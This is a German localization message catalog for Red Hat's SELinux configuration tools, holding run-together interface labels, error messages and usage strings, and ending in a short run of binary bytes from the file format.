Kann Richtlinien-Speicher nicht lesenProzessmodus in 'enforcing' ändernProzessmodus in 'permissive' ändern.Wenn der Richtlinientyp geändert wird, muss beim nächsten Neustart das vollständige Dateisystem neu gekennzeichnet werden. Die Neukennzeichnung kann je nach Grösse des Dateisystems sehr lange dauern. Wollen Sie fortfahren?Das Deaktivieren von SELinux erfordert einen Neustart. Es wird nicht empfohlen. Falls Sie nachträglich entscheiden, SELinux wieder zu aktivieren, muss das System neu gekennzeichnet werden. Falls Sie nur überprüfen möchten, ob SELinux ein Problem auf Ihrem System verursacht, können Sie in den 'permissive' Modus wechseln, in dem Fehler lediglich protokolliert, die SELinux-Richtlinien jedoch nicht erzwungen werden. Der 'permissive' Modus erfordert keinen Neustart. Möchten Sie fortfahren?Das Aktivieren von SELinux führt beim nächsten Neustart zu einer kompletten Neukennzeichnung des gesamten Dateisystems. Die Neukennzeichnung kann je nach Grösse des Dateisystems sehr lange dauern. Wollen Sie fortfahren?KompatibilitätSELinux konfigurierenInhaltCopyright (c)2006 Red Hat, Inc.
Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>Konnte SELinux-Benutzer %s nicht hinzufügenKonnte addr %s nicht hinzufügenKonnte Dateikontext für %s nicht hinzufügenKonnte Schnittstelle %s nicht hinzufügenLogin-Zuweisung für %s konnte nicht hinzugefügt werdenKonnte Port %s/%s nicht hinzufügenKonnte Präfix %s für %s nicht hinzufügenKonnte Funktion %s für %s nicht hinzufügenKonnte nicht überprüfen ob SELinux-Benutzer %s definiert istKonnte nicht prüfen, ob addr %s definiert istKonnte nicht überprüfen, ob Boolesche Variable %s definiert istKonnte nicht überprüfen, ob Dateikontext für %s definiert istKonnte nicht überprüfen, ob die Schnittstelle %s definiert istKonnte nicht überprüfen ob die Login-Zuweisung für %s zugewiesen istKonnte nicht prüfen, ob Port %s/%s definiert istKonnte Deskriptoren nicht schliessen.
semanage-Transaktion konnte nicht gestartet werdenKonnte SELinux-Benutzer für %s nicht erstellenKonnte keinen Schlüssel für %s erstellenKonnte Schlüssel für %s/%s nicht erstellenKonnte keine addr für %s erstellenKonnte keinen Kontext für %s kreierenKonnte Kontext für %s/%s nicht erstellenKonnte Dateikontext für %s nicht kreierenKonnte keine Schnittstelle für %s kreierenKonnte Schlüssel für %s nicht kreierenLogin-Zuweisung für %s konnte nicht erstellt werdenKonnte Port für %s/%s nicht erstellensemanage-Handle konnte nicht erstellt werdenKonnte SELinux-Benutzer %s nicht löschenKonnte addr %s nicht löschenKonnte Boolesche Variable %s nicht löschenKonnte Dateikontext für %s nicht löschenKonnte Schnittstelle %s nicht löschenKonnte Login-Zuweisung für %s nicht löschenKonnte Port %s/%s nicht löschenKonnte Dateikontext für %s nicht löschenKonnte Port %s nicht löschenKonnte Enforcing-Modus nicht beenden.
Konnte semanage-Verbindung nicht herstellenKonnte Schlüssel für %s nicht extrahierenKonnte SELinux-Module nicht auflistenKonnte SELinux-Benutzer nicht auflistenKonnte addrs nicht auflistenKonnte Boolesche Variablen nicht auflistenKonnte Dateikontexte nicht auflistenKonnte Schnittstellen nicht auflistenKonnte lokale Dateikontexte nicht auflistenKonnte Login-Zuweisungen nicht anzeigenKonnte Ports nicht auflistenKonnte Funktionen für Benutzer %s nicht auflistenKonnte Dateikontexte nicht auflistenKonnte Ports nicht auflistenKonnte SELinux-Benutzer %s nicht ändernKonnte addr %s nicht ändernKonnte Boolesche Variable %s nicht ändernKonnte Dateikontext für %s nicht erneuernKonnte Schnittstelle %s nicht modifizierenKonnte Login-Zuweisung für %s nicht ändernKonnte Port %s/%s nicht ändernKonnte Datei %s nicht öffnen
Konnte addr %s nicht abfragenKonnte den Dateikontext %s nicht abfragenKonnte Dateikontext für %s nicht abfragenKonnte Schnittstelle %s nicht abfragenKonnte Port %s/%s nicht abfragenKonnte seuser für %s nicht abfragenKonnte Benutzer für %s nicht abfragenKonnte permissive Domain %s nicht entfernen (Entfernen fehlgeschlagen)Konnte MLS-Level für %s nicht setzenMLS-Bereich für %s konnte nicht gesetzt werdenSELinux-Benutzer für %s konnte nicht gesetzt werdenKonnte Boolesche Variable %s nicht auf aktiv setzenKonnte addr-Kontext für %s nicht setzenKonnte exec-Kontext nicht auf %s setzen.
Konnte Dateikontext für %s nicht setzenKonnte Schnittstellenkontext für %s nicht setzenMaske für %s konnte nicht gesetzt werdenKonnte Nachricht-Kontext für %s nicht setzenKonnte die mls-Felder in addr-Kontext für %s nicht setzenKonnte die mls-Felder in Dateikontext für %s nicht setzenKonnte die mls-Felder in Schnittstellenkontext für %s nicht setzenKonnte MLS-Felder in Port-Kontext für %s/%s nicht setzenBezeichnung für %s konnte nicht gesetzt werdenKonnte permissive Domain %s nicht setzen (Modul-Installation fehlgeschlagen)Konnte Port-Kontext für %s/%s nicht setzenKonnte Aufgabe in addr-Kontext für %s nicht setzenKonnte Aufgabe in Dateikontext für %s nicht setzenKonnte Aufgabe in Schnittstellenkontext für %s nicht setzenKonnte Funktion in Port-Kontext für %s/%s nicht setzenKonnte Typ in addr-Kontext für %s nicht setzenKonnte Typ in Dateikontext für %s nicht setzenKonnte Typ in Schnittstellenkontext für %s nicht setzenKonnte Typ in Port-Kontext für %s/%s nicht setzenKonnte Benutzer in Addr-Kontext für %s nicht setzenKonnte Benutzer in Dateikontext für %s nicht setzenKonnte Benutzer in Schnittstellenkontext für %s nicht setzenKonnte Benutzer in Port-Kontext für %s/%s nicht setzensemanage-Transaktion konnte nicht gestartet werdenMLS-Status konnte nicht auf Aktivierung überprüft werdenStandardtyp konnte nicht abgerufen werden.
Erstellt/Ändert temporäre Dateien in /tmpCronDerzeitiger Enforcing-ModusAngepasstDBUS-System-DaemonDatenbanken%s löschenDateikontext löschenNetzwerk-Port löschenSELinux-Benutzerzuordnung löschenBenutzer löschenBeschreibungAudit deaktivierenSELinux-Schutz für Cluster-Server deaktivierenSELinux-Schutz für Evolution deaktivierenSELinux-Schutz für Hal-Daemon deaktivierenSELinux-Schutz für NIS-Passwort-Daemon deaktivierenSELinux-Schutz für NIS-Transfer-Daemon deaktivierenSELinux-Schutz für NetworkManager deaktivierenSELinux-Schutz für Thunderbird deaktivierenSELinux-Schutz für acct-Daemon deaktivierenSELinux-Schutz für amanda deaktivierenSELinux-Schutz für amavis deaktivierenSELinux-Schutz für apmd-Daemon deaktivierenSELinux-Schutz für apmd-Daemon deaktivierenSELinux-Schutz für auditd-Daemon deaktivierenSELinux-Schutz für automount-Daemon deaktivierenSELinux-Schutz für avahi deaktivierenSELinux-Schutz für bluetooth-Daemon deaktivierenSELinux-Schutz für canna-Daemon deaktivierenSELinux-Schutz für cardmgr-Daemon deaktivierenSELinux-Schutz für cardmgr-Daemon deaktivierenSELinux-Schutz für clamd-Daemon deaktivierenSELinux-Schutz für clamscan deaktivierenSELinux-Schutz für clvmd deaktivierenSELinux-Schutz für comsat-Daemon deaktivierenSELinux-Schutz für courier-Daemon deaktivierenSELinux-Schutz für cpucontrol-Daemon deaktivierenSELinux-Schutz für cpuspeed-Daemon deaktivierenSELinux-Schutz für crond-Daemon deaktivierenSELinux-Schutz für cups hplip-Daemon deaktivierenSELinux-Schutz für cupsd Backend-Server deaktivierenSELinux-Schutz für cupsd-Daemon deaktivierenSELinux-Schutz für cupsd_lpd deaktivierenSELinux-Schutz für cvs-Daemon deaktivierenSELinux-Schutz für cyrus-Daemon deaktivierenSELinux-Schutz für dbskkd-Daemon deaktivierenSELinux-Schutz für dbusd-Daemon deaktivierenSELinux-Schutz für dccd deaktivierenSELinux-Schutz für dccifd deaktivierenSELinux-Schutz für dccm deaktivierenSELinux-Schutz für ddt-Daemon deaktivierenSELinux-Schutz für devfsd-Daemon deaktivierenSELinux-Schutz für dhcpc-Daemon deaktivierenSELinux-Schutz für dhcpd-Daemon deaktivierenSELinux-Schutz für dictd-Daemon deaktivierenSELinux-Schutz für distccd-Daemon deaktivierenSELinux-Schutz für dmesg-Daemon deaktivierenSELinux-Schutz für dnsmasq-Daemon deaktivierenSELinux-Schutz für dovecot-Daemon deaktivierenSELinux-Schutz für entropyd-Daemon deaktivierenSELinux-Schutz für fetchmail deaktivierenSELinux-Schutz für fingerd-Daemon deaktivierenSELinux-Schutz für freshclam-Daemon deaktivierenSELinux-Schutz für fsdaemon-Daemon deaktivierenSELinux-Schutz für Spiele deaktivierenSELinux-Schutz für gpm-Daemon deaktivierenSELinux-Schutz für gss-Daemon deaktivierenSELinux-Schutz für hostname-Daemon deaktivierenSELinux-Schutz für hotplug-Daemon deaktivierenSELinux-Schutz für howl-Daemon deaktivierenSELinux-Schutz für http suexec deaktivierenSELinux-Schutz für httpd rotatelogs deaktivierenSELinux-Schutz für hwclock-Daemon deaktivierenSELinux-Schutz für i18n-Daemon deaktivierenSELinux-Schutz für imazesrv-Daemon deaktivierenSELinux-Schutz für inetd-Kind-Daemons deaktivierenSELinux-Schutz für inetd-Daemon deaktivierenSELinux-Schutz für innd-Daemon deaktivierenSELinux-Schutz für iptables-Daemon deaktivierenSELinux-Schutz für ircd-Daemon deaktivierenSELinux-Schutz für irqbalance-Daemon deaktivierenSELinux-Schutz für iscsi-Daemon deaktivierenSELinux-Schutz für jabberd-Daemon deaktivierenSELinux-Schutz für kadmind-Daemon deaktivierenSELinux-Schutz für klogd-Daemon deaktivierenSELinux-Schutz für krb5kdc-Daemon deaktivierenSELinux-Schutz für ktalk-Daemons deaktivierenSELinux-Schutz für kudzu-Daemon deaktivierenSELinux-Schutz für locate-Daemon deaktivierenSELinux-Schutz für lpd-Daemon deaktivierenSELinux-Schutz für lrrd-Daemon deaktivierenSELinux-Schutz für lvm-Daemon deaktivierenSELinux-Schutz für mailman deaktivierenSELinux-Schutz für mdadm-Daemon deaktivierenSELinux-Schutz für monopd-Daemon deaktivierenSELinux-Schutz für mrtg-Daemon deaktivierenSELinux-Schutz für mysqld-Daemon deaktivierenSELinux-Schutz für nagios-Daemon deaktivierenSELinux-Schutz für named-Daemon deaktivierenSELinux-Schutz für nessusd-Daemon deaktivierenSELinux-Schutz für nfsd-Daemon deaktivierenSELinux-Schutz für nmbd-Daemon deaktivierenSELinux-Schutz für nrpe-Daemon deaktivierenSELinux-Schutz für nscd-Daemon deaktivierenSELinux-Schutz für nsd-Daemon deaktivierenSELinux-Schutz für ntpd-Daemon deaktivierenSELinux-Schutz für oddjob deaktivierenSELinux-Schutz für oddjob_mkhomedir deaktivierenSELinux-Schutz für openvpn-Daemon deaktivierenSELinux-Schutz für pam-Daemon deaktivierenSELinux-Schutz für pegasus deaktivierenSELinux-Schutz für perdition-Daemon deaktivierenSELinux-Schutz für portmap-Daemon deaktivierenSELinux-Schutz für portslave-Daemon deaktivierenSELinux-Schutz für postfix deaktivierenSELinux-Schutz für postgresql-Daemon deaktivierenSELinux-Schutz für pptp deaktivierenSELinux-Schutz für prelink-Daemon deaktivierenSELinux-Schutz für privoxy-Daemon deaktivierenSELinux-Schutz für ptal-Daemon deaktivierenSELinux-Schutz für pxe-Daemon deaktivierenSELinux-Schutz für pyzord deaktivierenSELinux-Schutz für quota-Daemon deaktivierenSELinux-Schutz für radiusd-Daemon deaktivierenSELinux-Schutz für radvd-Daemon deaktivierenSELinux-Schutz für rdisc deaktivierenSELinux-Schutz für readahead deaktivierenSELinux-Schutz für restorecond deaktivierenSELinux-Schutz für rhgb-Daemon deaktivierenSELinux-Schutz für ricci deaktivierenSELinux-Schutz für ricci_modclusterd deaktivierenSELinux-Schutz für rlogind-Daemon deaktivierenSELinux-Schutz für rpcd-Daemon deaktivierenSELinux-Schutz für rshd-Daemon deaktivierenSELinux-Schutz für rsync-Daemon deaktivierenSELinux-Schutz für saslauthd-Daemon deaktivierenSELinux-Schutz für scannerdaemon-Daemon deaktivierenSELinux-Schutz für sendmail-Daemon deaktivierenSELinux-Schutz für setrans deaktivierenSELinux-Schutz für setroubleshoot-Daemon deaktivierenSELinux-Schutz für slapd-Daemon deaktivierenSELinux-Schutz für slrnpull-Daemon deaktivierenSELinux-Schutz für smbd-Daemon deaktivierenSELinux-Schutz für snmpd-Daemon deaktivierenSELinux-Schutz für snort-Daemon deaktivierenSELinux-Schutz für sound-Daemon deaktivierenSELinux-Schutz für soundd-Daemon deaktivierenSELinux-Schutz für spamd-Daemon deaktivierenSELinux-Schutz für speedmgmt-Daemon deaktivierenSELinux-Schutz für squid-Daemon deaktivierenSELinux-Schutz für ssh-Daemon deaktivierenSELinux-Schutz für stunnel-Daemon deaktivierenSELinux-Schutz für swat-Daemon deaktivierenSELinux-Schutz für sxid-Daemon deaktivierenSELinux-Schutz für syslogd-Daemon deaktivierenSELinux-Schutz für System cron-Dienst deaktivierenSELinux-Schutz für tcp-Daemon deaktivierenSELinux-Schutz für telnet-Daemon deaktivierenSELinux-Schutz für tftpd-Daemon deaktivierenSELinux-Schutz für die Webbrowser deaktivierenSELinux-Schutz für transproxy-Daemon deaktivierenSELinux-Schutz für udev-Daemon deaktivierenSELinux-Schutz für uml-Daemon deaktivierenSELinux-Schutz für updfstab-Daemon deaktivierenSELinux-Schutz für uptimed-Daemon deaktivierenSELinux-Schutz für uucpd-Daemon deaktivierenSELinux-Schutz für vmware-Daemon deaktivierenSELinux-Schutz für watchdog-Daemon deaktivierenSELinux-Schutz für winbind-Daemon deaktivierenSELinux-Schutz für xdm-Daemon deaktivierenSELinux-Schutz für xen-Steuerung deaktivierenSELinux-Schutz für xen-Daemon deaktivierenSELinux-Schutz für xfs-Daemon deaktivierenSELinux-Schutz für ypbind-Daemon deaktivierenSELinux-Schutz für ypserv-Daemon deaktivierenDeaktiviertDeaktiviert
Permissive
Enforcing
Keinen Prozessen erlauben, Kernelmodule zu ladenKeinem Prozess erlauben, die Kernel-SELinux-Richtlinie zu verändernWechsel zu 'sysadm_t' nicht erlauben. Davon betroffen sind 'sudo' und 'su'Dinge, die als defekt bekannt sind, aber keine Gefährdung der Sicherheit darstellen, nicht überprüfenNetzwerk-Port bearbeitenAudit aktivierenZusätzliche Audit-Regeln aktivieren/deaktivieren, die normalerweise nicht in den Protokolldateien erscheinen.EnforcingGeben Sie den vollständigen Pfad der ausführbaren Datei ein, die eingeschränkt werden soll.Geben Sie einen vollständigen Pfad zum Init-Skript ein, das verwendet wird, um die eingeschränkte Anwendung zu starten.Geben Sie einen eindeutigen Namen für die eingeschränkte Anwendung oder Benutzerrolle ein.Fehler beim Reservieren des Speichers.
Fehler beim Zuweisen von argv0 für die Shell.
Fehler beim Ändern der Benutzerkennung (uid), Abbruch.
Fehler beim Verbinden für Systemprüfung.
Fehler beim Verwerfen der SETUID-Funktion, Abbruch.
Fehler beim Verwerfen von Funktionen.
Fehler beim Lösen von Caps
Fehler bei der Funktionsinitialisierung, Abbruch.
Fehler beim Zurücksetzen von KEEPCAPS, Abbruch
Fehler beim Senden der Prüfungsmeldung.
Fehler bei der KEEPCAPS-Einrichtung, Abbruch
Fehler bei der Leistungsinitialisierung, Abbruch
Fehler! Konnte %s nicht öffnen.
Fehler! Shell ist ungültig.
Fehler: mehrere Stufen angegeben
Fehler: mehrere Funktionen angegeben
Fehler: mehrere Typen angegeben
Fehler: Sie dürfen die Stufen an einem unsicheren Terminal nicht verändern 
Ausführbare DateiVorhandene BenutzerrollenBestehender_BenutzerOrdnungsgemässes Schliessen von tty fehlgeschlagen
Datei-
spezifikationDatei-
typDateikontextdateiDateikennzeichnungDateispezifikationDateitypDer Kontext für Datei %s ist in der Richtlinie festgelegt und kann nicht entfernt werdenDateikontext für %s ist nicht definiertFilterGPLSpieleNeues Richtlinienmodul erstellenGruppenansichtHTTPD-DienstInit-SkriptInteragiert mit dem TerminalSchnittstelle %s ist in der Richtlinie festgelegt und kann nicht entfernt werdenSchnittstelle %s ist nicht definiertSchnittstellendateiInternet Services Daemon (inetd)Internet Services Daemon sind von xinited gestartete DaemonsUngültige DateiangabeKerberosKennzeichnungLinux-Gruppe %s existiert nichtLinux-Benutzer %s existiert nichtListenansichtLade RichtlinienmodulRichtlinienmodul ladenSperren...Benutzer-
nameAnmeldung mit '%s' wird benötigtBenutzername:Login-Zuordnung für %s ist in der Richtlinie festgelegt und kann nicht entfernt werdenLogin-Zuordnung für %s ist nicht definiertMCS-StufeMCS-BereichMLSMLS/MLS/
MCS-BereichMLS/MCS-
StufeMLS/MCS-BereichSpeicherschutzMinimale Terminal-BenutzerrolleMinimale X-Windows-Benutzerrolle%s bearbeitenDateikontext ändernSELinux-Benutzerzuordnung ändernBenutzer bearbeitenÄndere einen existierenden Benutzerdatensatz.Modul %s.pp ist in aktueller Richtlinie bereits geladen.
Wollen Sie fortfahren?ModulnameEinhängenNFSNISNameNamensdienstNetzwerkkonfigurationNetzwerk-PortKein Kontext in Datei %s
Node-Adresse wird benötigtNode-Netzmaske wird benötigtNoch nicht implementiertOptionenfehler %s Nicht genügend Speicher!
Passwort:PermissivePolgenRichtlinienverzeichnisRichtlinienmodulPortPort %s/%s ist bereits definiertPort %s/%s ist in der Richtlinie festgelegt und kann nicht entfernt werdenPort %s/%s ist nicht definiertPort-NummerPort wird benötigtPort-Nummer "%s" ist ungültig.  0 < PORT_NUMMER < 65536 Ports müssen Nummern oder Nummernbereiche von 1 bis %d seinPräfixDruckenProzess-DomainnProtoProtokollProtokoll UDP oder TCP wird benötigtRed Hat 2007Beim nächsten Neustart neu kennzeichnen.Ladbares Richtlinienmodul löschenBenötigt mindestens eine KategorieBenötigt Präfix oder FunktionenBenötigt Präfix, Funktionen, Level oder BereichBenötigt setypeBenötigt setype oder serangeBenötigt setype, serange oder seuserBenötigt seuser oder serangeEinstellungen der Booleschen Variablen auf Standardeinstellungen des Systems zurücksetzenRolleRoot-Admin-BenutzerrolleSperr-Assistenten für Boolesche Variablen ausführenSASL-Authentifizierungs-ServerSELinux-
BenutzerSELinux-AdministrationSELinux-SchnittstelleTool zur Erstellung von SELinux-RichtlinienSELinux Port-
TypSELinux Port-TypSELinux-RollenSELinux-DienstschutzSELinux-TypSELinux-Typ wird benötigtSELinux-BenutzerSELinux Boolesche VariablenSELinux-fcontextSELinux-Richtlinie wird nicht verwaltet oder auf den Speicher kann nicht zugegriffen werden.SELinux-Benutzer %s ist in der Richtlinie definiert und kann nicht entfernt werdenSELinux-Benutzer %s ist nicht definiertSELinux-Benutzer '%s' wird benötigtSSHSambaManagement-Objekt auswählenPorts auswählenWählen Sie Root-Administrator-Benutzerrolle, wenn dieser Benutzer zur Verwaltung des Rechners als Root-Benutzer verwendet wird. Dieser Benutzer kann sich nicht direkt auf dem System einloggen.Wählen Sie das Verzeichnis, in dem die Richtliniendateien generiert werden sollenWählen Sie das/die Verzeichnis(se), die die eingeschränkte Anwendung besitzt und beschreibtWählen Sie eine ausführbare Datei, die eingeschränkt werden soll.Wählen Sie die Datei(en), die eine eingeschränkte Anwendung erstellt oder schreibtWählen Sie aus, ob Sie das gesamte Dateisystem beim nächsten Neustart neu kennzeichnen möchten.  Die Neukennzeichnung kann je nach Grösse des Dateisystems sehr lange dauern. Falls Sie die Richtlinientypen ändern oder vom Zustand 'disabled' zu 'enforcing' wechseln, ist eine Neukennzeichnung erforderlich.Wählen Sie eine Init-Skript-Datei, die eingeschränkt werden soll.Wählen Sie die Domains, die dieser Benutzer verwalten soll.Wählen Sie die Benutzerrolle(n), die auf diese Anwendungs-Domains wechseln sollen.Selinux-
DateitypSemanage-Transaktion bereits im GangSemanage-Transaktion nicht im GangSendet Audit-MeldungenSendet E-MailSkript zum EinrichtenSorry, -l darf nur mit SELinux-MLS-Unterstützung benutzt werden.
Sorry, newrole darf nur auf einem SELinux-Kernel benutzt werden.
Sorry, run_init darf nur auf einem SELinux-Kernel benutzt werden.
Spam-SchutzSquidStandard-Init-DaemonStandard-Init-Daemons sind Daemons, die beim Booten mittels Init-Skripten gestartet werden. Erfordert normalerweise ein Skript in /etc/rc.d/init.dStatusSystemstandard Enforcing-ModusSystemstandard-Richtlinientyp: Dieser Benutzer kann sich via X oder Terminal an einem Rechner anmelden. Standardmässig besitzt dieser Benutzer kein setuid, kein Netzwerk, kein sudo und kein su.Dieser Benutzer meldet sich auf einem Rechner nur via Terminal oder Remote-Login an. Standardmässig besitzt dieser Benutzer kein setuid, kein Netzwerk, kein su und kein sudo.Um dieses Richtlinien-Paket zu aktivieren, führen Sie folgendes aus:Zwischen 'Angepasst' und 'Alle' Boolschen Variablen wechselnZwischen 'Angepassten' und 'Allen' Ports wechselnZwischen 'Angepassten' und 'Allen' Dateikontexten wechseln'staff'-SELinux-Benutzer auf Web-Browser-Domain übertragen'sysadmin'-SELinux-Benutzer auf Web-Browser-Domain übertragen'user'-SELinux-Benutzer auf Web-Browser-Domain übertragen'xguest'-SELinux-Benutzer auf Web-Browser-Domain übertragenTyp %s_t ist in aktueller Richtlinie bereits definiert.
Wollen Sie fortfahren?Typ-Enforcement-DateiTyp wird benötigtVERWENDUNG: run_init <script> <args ...>
  dabei ist <script> der Name des Init-Skripts, das Sie ausführen möchten und
            <args ...> sind die Argumente für dieses Skript.USER-Typen erhalten automatisch einen tmp-TypKann new_context keinen Speicher zuweisenKann Umgebung nicht löschen
Kann keine leere Signalmenge erhalten
Kann Umgebung nicht wiederherstellen, Abbruch
Kann tty-Label nicht wiederherstellen ...
Kann SIGHUP-Handler nicht setzen
Universeller SSL-TunnelUnbekanntes oder fehlendes ProtokollNicht reservierte Ports (>1024)Verwendung %s -LVerwendung %s -L -l BenutzerVerwendung %s -d Datei ...Verwendung %s -l -d Benutzer ...Verwendung %s -l KATEGORIE Benutzer ...Verwendung %s -l [[+|-]KATEGORIE],...]q Benutzer ...Verwendung %s KATEGORIE Datei ...Verwendung %s [[+|-]KATEGORIE],...]q Datei ...Verwenden Sie -- zum Abschluss der Optionsliste. Zum BeispielBenutzeranwendungEine Benutzeranwendung ist eine beliebige Anwendung, die von einem Benutzer gestartet wird und die Sie einschränken möchtenBenutzerzuordnungBenutzerprivilegienBenutzerrolleBenutzer mit vollem Zugriff auf das Netzwerk, keine setuid-Anwendung ohne Übertragung, kein su, kann mit sudo in Root-Administrationsrolle wechselnBenutzer mit vollem Zugriff auf das Netzwerk, keine setuid-Anwendung ohne Übertragung, kein sudo, kein su.Benutzt Pam zur AuthentifizierungBenutzt dbusBenutzt nsswitch- oder getpw*-AufrufeÜberprüfe NamenVersionWarnung! Konnte tty-Informationen nicht abrufen.
Warnung! Kontext für %s nicht wiederherstellbar
Web-Applikation/Skript (CGI)Web-AnwendungenWeb-Applikationen/Skript (CGI) CGI-Skripte, die vom Web-Server (Apache) gestartet werdenSchreibt Syslog-Nachrichten	XENXServerSie müssen mindestens eine Rolle für %s hinzufügenSie müssen eine ausführbare Datei angebenSie müssen einen Namen für Ihren eingeschränkten Prozess/Benutzer angebenSie müssen einen ausführbaren Pfad für Ihren eingeschränkten Prozess eingebenSie müssen einen Benutzer auswählenSie müssen einen der folgenden Werte angeben: %s_Löschen_EigenschaftenAllealle Dateien
reguläre Datei
Verzeichnis
Zeichengerät
Blockgerät
Socket
symbolischer Link
Named-Pipe
Authentifizierung fehlgeschlagen.
Kann keinen gültigen Eintrag in der passwd-Datei finden.
chcat -- -Vertraulich /docs/geschäftsplanung.odtchcat -l +Vertraulich juserFehler beim Lesen der PAM-Dienstkonfiguration.
Erstellung von neuem Bereich mit Stufe %s fehlgeschlagen
Konvertierung des neuen Kontexts in String fehlgeschlagen
Ausführen der Shell fehlgeschlagen
Konnte keine Account-Informationen abrufen
Erhalt des neuen Kontexts fehlgeschlagen.
Erhalt von old_context fehlgeschlagen.
Initialisieren von PAM fehlgeschlagen
Einstellung von PAM_TTY fehlgeschlagen
Setzen von neuem Bereich %s fehlgeschlagen
Setzen der neuen Rolle %s fehlgeschlagen
Setzen des neuen Typs %s fehlgeschlagen
getpass kann /dev/tty nicht öffnen
globallabel37label38label39label41label42label44label50label59newrole:  %s:  Fehler in Zeile %lu.
newrole: Fork fehlgeschlagen: %snewrole: falsches Passwort für %s
newrole: Hashtable-Overflow der Konfiguration des Namens des Dienstes
auseinpppdrsyncrun_init: falsches Passwort für %s
system-config-selinuxHolger Wansing <linux@wansing-online.de>, 2006.
Timo Trinks <ttrinks@redhat.com>, 2006, 2007.
Michael Schönitzer <michael@schoenitzer.de>, 2007.
Fabian Affolter <fab@fedoraproject.org>, 2008,2009.
Timo Trinks <ttrinks@redhat.com>, 2008.
Daniela Kugelmann <dkugelma@redhat.com >, 2008.
Hedda Peters <hpeters@redhat.com>, 2009.TypunbekanntVerwendung:  %s [-qi]
use_syslog muss ein Boolescher Wert sein
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`